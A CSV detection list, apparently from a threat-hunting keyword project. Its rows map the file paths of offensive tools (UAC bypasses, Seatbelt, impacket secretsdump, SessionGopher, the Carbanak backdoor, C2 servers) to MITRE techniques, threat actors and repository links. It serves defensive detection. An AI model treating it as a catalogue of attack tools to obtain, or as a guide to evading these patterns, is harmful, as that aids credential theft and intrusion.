"*\sc-loader.exe*",".{0,1000}\\sc\-loader\.exe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","18294"
"*\SCMUACBypass.cpp*",".{0,1000}\\SCMUACBypass\.cpp.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","18295"
"*\scmuacbypass.cpp*",".{0,1000}\\scmuacbypass\.cpp.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","18296"
"*\SCMUACBypass.exe*",".{0,1000}\\SCMUACBypass\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SCMUACBypass","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18297"
"*\scmuacbypass.exe*",".{0,1000}\\scmuacbypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","18298"
"*\SCMUACBypass.exe*",".{0,1000}\\SCMUACBypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SCMUACBypass","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18299"
"*\SCMUACBypass\*",".{0,1000}\\SCMUACBypass\\.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","18300"
"*\ScriptBlock-Smuggling*",".{0,1000}\\ScriptBlock\-Smuggling.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","N/A","https://bc-security.org/scriptblock-smuggling/","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","18313"
"*\ScriptSentry.ps1*",".{0,1000}\\ScriptSentry\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","18319"
"*\ScriptSentry.psd1*",".{0,1000}\\ScriptSentry\.psd1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","18320"
"*\ScriptSentry.psm1*",".{0,1000}\\ScriptSentry\.psm1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","18321"
"*\ScriptSentry.txt*",".{0,1000}\\ScriptSentry\.txt.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","18322"
"*\scuffy.py*",".{0,1000}\\scuffy\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","18323"
"*\sdb-explorer.exe*",".{0,1000}\\sdb\-explorer\.exe.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","18324"
"*\sdb-explorer.sln*",".{0,1000}\\sdb\-explorer\.sln.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","18325"
"*\SearchShares.ps1*",".{0,1000}\\SearchShares\.ps1.{0,1000}","offensive_tool_keyword","SearchOpenFileShares","Searches open files shares for password files or database backups - Extend as you see fit","T1083 - T1135 - T1005 - T1025","TA0007 - TA0009","N/A","Dispossessor","Discovery","https://github.com/fashionproof/SearchOpenFileShares","1","0","N/A","N/A","7","1","29","6","2019-12-13T12:37:42Z","2019-09-21T13:50:26Z","18330"
"*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18331"
"*\SeatBelt.exe*",".{0,1000}\\SeatBelt\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","18332"
"*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","18333"
"*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18334"
"*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Seatbelt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18335"
"*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","seatbelt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Seatbelt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18336"
"*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18337"
"*\Seatbelt.sln*",".{0,1000}\\Seatbelt\.sln.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","18338"
"*\Seatbelt.txt*",".{0,1000}\\Seatbelt\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","18339"
"*\Seatbelt\Commands\*",".{0,1000}\\Seatbelt\\Commands\\.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","18340"
"*\Seatbelt\Program.cs*",".{0,1000}\\Seatbelt\\Program\.cs.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","18341"
"*\Seatbelt\Seatbelt.cs*",".{0,1000}\\Seatbelt\\Seatbelt\.cs.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","18342"
"*\SeAuditPrivilegePoC.exe*",".{0,1000}\\SeAuditPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","18343"
"*\SeBackupPrivilegePoC.exe*",".{0,1000}\\SeBackupPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","18344"
"*\SecondaryLogonVariant.exe*",".{0,1000}\\SecondaryLogonVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","18345"
"*\secretsdump.exe*",".{0,1000}\\secretsdump\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18346"
"*\secretsdump.py*",".{0,1000}\\secretsdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18347"
"*\secretsdump.py*",".{0,1000}\\secretsdump\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","18348"
"*\secretsmanagerenum.py*",".{0,1000}\\secretsmanagerenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","18349"
"*\SecretStealer.ps1*",".{0,1000}\\SecretStealer\.ps1.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","18350"
"*\SelectMyParent.exe*",".{0,1000}\\SelectMyParent\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18351"
"*\SelectObjectCommand.cs",".{0,1000}\\SelectObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","18352"
"*\self_deletion.exe*",".{0,1000}\\self_deletion\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18353"
"*\sendkeys.ps1*",".{0,1000}\\sendkeys\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18354"
"*\SeRestorePrivilegeTestFile.txt*",".{0,1000}\\SeRestorePrivilegeTestFile\.txt.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","18355"
"*\server\VncSharp\obj\Debug\VncSharp.pdb*",".{0,1000}\\server\\VncSharp\\obj\\Debug\\VncSharp\.pdb.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#content","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","18356"
"*\ServerC2.cpp*",".{0,1000}\\ServerC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","18357"
"*\ServerC2.exe*",".{0,1000}\\ServerC2\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","18358"
"*\ServerC2\ServerC2.*",".{0,1000}\\ServerC2\\ServerC2\..{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","18359"
"*\servers\dns_server.py*",".{0,1000}\\servers\\dns_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","18360"
"*\servers\icmp_server.py*",".{0,1000}\\servers\\icmp_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","18361"
"*\servers\smb_server.py*",".{0,1000}\\servers\\smb_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","18362"
"*\services.py*",".{0,1000}\\services\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18364"
"*\services\p2p\p2p.go*",".{0,1000}\\services\\p2p\\p2p\.go.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","18370"
"*\services\PWDumpX\*",".{0,1000}\\services\\PWDumpX\\.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#registry","N/A","10","8","N/A","N/A","N/A","N/A","18371"
"*\SessionExec.exe*",".{0,1000}\\SessionExec\.exe.{0,1000}","offensive_tool_keyword","SessionExec","Execute commands in other Sessions","T1053 - T1569","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/SessionExec","1","0","N/A","N/A","10","1","86","14","2024-07-29T12:24:28Z","2024-07-21T15:32:07Z","18375"
"*\SessionGopher.ps1*",".{0,1000}\\SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18376"
"*\SessionGopher.ps1*",".{0,1000}\\SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","0","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","18377"
